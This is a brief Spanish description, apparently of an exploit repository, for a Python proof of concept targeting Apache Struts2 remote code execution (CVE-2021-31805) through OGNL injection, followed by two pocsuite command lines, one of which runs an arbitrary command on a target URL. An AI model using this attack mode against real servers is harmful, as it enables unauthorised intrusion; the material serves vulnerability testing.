
Prueba de concepto y exploit basado en Python para RCE en Apache Struts2 (CVE-2021-31805), que permite la ejecución de comandos mediante inyección OGNL. Incluye modos POC y EXP para pruebas de seguridad.
pocsuite -r CVE_2021_31805_POC_EXP.py -u url

pocsuite -r CVE_2021_31805_POC_EXP.py -u url --attack --command "[command]"
